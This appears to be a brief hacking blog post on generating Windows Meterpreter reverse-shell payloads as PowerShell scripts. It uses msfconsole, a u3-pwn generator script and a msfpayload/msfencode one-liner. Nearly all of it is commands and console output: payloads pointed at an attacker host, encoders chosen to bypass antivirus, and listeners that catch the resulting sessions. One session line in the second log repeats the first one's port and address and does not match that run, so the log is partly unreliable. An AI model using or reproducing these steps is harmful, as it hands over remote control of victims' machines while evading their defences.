This is a nice little trick to generate a Meterpreter payload as a PowerShell script straight from msfconsole (the payload module's generate command with the psh format):
msf exploit(handler) > use windows/x64/meterpreter/reverse_tcp
msf payload(reverse_tcp) > generate -t psh -f /var/www/pwShell.ps1
[-] Payload generation failed: The following options failed to validate: LHOST.
msf payload(reverse_tcp) > set LHOST 192.168.1.108
LHOST => 192.168.1.108
msf payload(reverse_tcp) > set LPORT 5555
LPORT => 5555
msf payload(reverse_tcp) > generate -t psh -f /var/www/pwShell.ps1
[*] Writing 3620 bytes to /var/www/pwShell.ps1...
msf payload(reverse_tcp) > use multi/handler
msf exploit(handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.108
LHOST => 192.168.1.108
msf exploit(handler) > set LPORT 5555
LPORT => 5555
msf exploit(handler) > exploit -j
[*] Exploit running as background job.
msf exploit(handler) >
[*] Started reverse handler on 192.168.1.108:5555
[*] Starting the payload handler...
[*] Meterpreter session 1 closed. Reason: Died
[*] Sending stage (951296 bytes) to 192.168.1.103
[*] Meterpreter session 2 opened (192.168.1.108:5555 -> 192.168.1.103:56300) at 2012-12-10 10:40:26 +0000
And an easy way to make the PowerShell payloads, using the powershellgen.py script from u3-pwn:
root@bt:~/u3-pwn/resource/powershell_scripts# python powershellgen.py
What payload do you want to generate:
Name:                                   Description:
-----                                   ------------
1. Windows Shell Reverse_TCP            Windows Command Shell, Reverse TCP Stager
2. Windows Reverse_TCP Meterpreter      Windows Meterpreter (Reflective Injection), Reverse TCP Stager
3. Windows Reverse_TCP VNC DLL          VNC Server (Reflective Injection), Reverse TCP Stager
4. Windows Bind Shell                   Windows Command Shell, Bind TCP Stager
5. Windows Bind Shell X64               Windows x64 Command Shell, Bind TCP Inline
6. Windows Shell Reverse_TCP X64        Windows x64 Command Shell, Windows x64 Reverse TCP Stager
7. Windows Meterpreter Reverse_TCP X64  Windows x64 Meterpreter, Windows x64 Reverse TCP Stager
8. Windows Meterpreter Reverse HTTPS    Windows Meterpreter (Reflective Injection), Reverse HTTPS Stager
9. Windows Meterpreter Reverse DNS      Windows Meterpreter (Reflective Injection), Reverse TCP Stager (DNS)
Enter number: 2
What encoder would you like to try and bypass AV with?
Name:                   Description:
-----                   -----------
1. avoid_utf8_tolower   Avoid UTF8/tolower
2. shikata_ga_nai       Polymorphic XOR Additive Feedback Encoder
3. alpha_mixed          Alpha2 Alphanumeric Mixedcase Encoder
4. alpha_upper          Alpha2 Alphanumeric Uppercase Encoder
5. call4_dword_xor      Call+4 Dword XOR Encoder
6. countdown            Single-byte XOR Countdown Encoder
7. fnstenv_mov          Variable-length Fnstenv/mov Dword XOR Encoder
8. jmp_call_additive    Jump/Call XOR Additive Feedback Encoder
9. nonalpha             Non-Alpha Encoder
10. nonupper            Non-Upper Encoder
11. unicode_mixed       Alpha2 Alphanumeric Unicode Mixedcase Encoder
12. unicode_upper       Alpha2 Alphanumeric Unicode Uppercase Encoder
Enter number: 2
Please Enter Ip addr: 192.168.1.108
Please Enter A Port No: 4444
Generating Shellcode Please Wait...
Do you want to start a listener to receive the payload yes or no: yes
Starting Listener....
[*] Please wait while we load the module tree...
______________________________________________________________________________
| |
| 3Kom SuperHack II Logon |
|______________________________________________________________________________|
| |
| |
| |
| User Name: [ security ] |
| |
| Password: [ ] |
| |
| |
| |
| [ OK ] |
|______________________________________________________________________________|
| |
|______________________________________________________________________________|
=[ metasploit v4.5.0-dev [core:4.5 api:1.0]
+ -- --=[ 927 exploits - 499 auxiliary - 151 post
+ -- --=[ 251 payloads - 28 encoders - 8 nops
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.108
LPORT => 4444
[*] Started reverse handler on 192.168.1.108:4444
[*] Starting the payload handler...
[*] Sending stage (752128 bytes) to 192.168.1.113
[*] Meterpreter session 1 opened (192.168.1.108:5555 -> 192.168.1.103:56300) at 2012-12-10 10:40:26 +0000
Still working on the code, since I had trouble working out the base64 encoding in Python, as it has bad chars in the conversion.
EDIT:
The encoding is base64, but some characters come out replaced because they turn into null characters in the conversion. The reason is that PowerShell's -EncodedCommand expects base64 of the script as UTF-16LE text, so every ASCII character is followed by a 0x00 byte; those nulls are part of the format, so encode the script as UTF-16LE before base64-encoding it rather than stripping or replacing them. You can also use ps_encoder.py to apply msf encoders to the PowerShell script.
You can also build the script from the command line by piping msfpayload into msfencode with the psh output format:
msfpayload windows/shell/reverse_tcp LHOST=192.168.1.1 LPORT=4444 R | msfencode -e <encoder> -t psh > out.ps1